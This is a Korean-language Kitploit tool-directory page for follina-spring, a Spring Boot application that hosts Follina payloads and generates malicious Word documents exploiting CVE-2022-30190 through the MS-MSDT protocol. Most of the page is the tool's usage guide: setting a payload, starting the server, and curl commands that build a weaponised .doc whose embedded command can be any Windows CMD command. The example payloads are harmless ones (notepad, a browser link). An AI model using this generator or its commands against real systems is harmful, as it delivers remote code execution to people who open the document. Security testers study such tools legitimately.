Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
follina-spring — Follina 페이로드를 호스팅/활성화하는 서버 및 MS-MSDT 프로토콜을 악용하는 악성 Word 문서 생성기. (CVE-2022-30190) | Kitploit
도구/GitHubGitHub/dsibilio/follina-spring
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubdsibilio/follina-spring

follina-spring

Follina 페이로드를 호스팅/활성화하는 서버 및 MS-MSDT 프로토콜을 악용하는 악성 Word 문서 생성기. (CVE-2022-30190)

저장소 보기
44년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Follina MS-MSDT 익스플로잇 with Spring Boot

이 저장소는 Follina 페이로드를 호스트/활성화하는 서버이자, CVE-2022-30190을 악용하기 위한 공격 벡터로 사용될 악성 Word 문서 생성기 역할을 하는 간단한 Spring Boot 애플리케이션을 포함합니다.

이 취약점은 MSDT *(Microsoft Windows 지원 진단 도구)*를 통한 원격 코드 실행으로 구성됩니다.

서버 측 페이로드

원하는 고유 페이로드를 제공하려면 다음을 수행해야 합니다:

  • 페이로드 정의 (예):
root@kitploit:~
export FOLLINA_PAYLOAD="notepad.exe"
  • 정적 페이로드를 호스트할 서버 실행:
root@kitploit:~
mvn spring-boot:run
  • "Follina" Word 문서 생성:
root@kitploit:~
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc

현재 페이로드를 변경하려면 먼저 현재 활성 서버를 중단해야 하며, 새 페이로드를 정의한 후 단계를 반복해야 합니다.

참고: 페이로드는 Windows CMD를 통해 실행할 수 있는 모든 명령어로 대체할 수 있습니다.

클라이언트 측 페이로드

원하는 클라이언트 측 페이로드를 제공하려면 다음을 수행해야 합니다:

  • 런타임에 페이로드를 활성화할 서버 실행:
root@kitploit:~
mvn spring-boot:run
  • cmd 쿼리 매개변수를 지정하여 "Follina" Word 문서 생성 (예):
root@kitploit:~
curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc

이 경우 페이로드는 문서 내에 포함되어 있으며, 서버에 접촉하여 활성화만 하면 됩니다. 이렇게 하면 여러 문서에 여러 다른 페이로드를 분산시킬 수 있으며, 페이로드 변경을 위해 서버를 재시작할 필요 없이 원하는 페이로드가 포함된 새 문서를 생성하기만 하면 됩니다.

감사 인사

Python 구현을 만들어내고 CVE 분석을 공유해 주신 John Hammond님께 감사드립니다.

도구 다운로드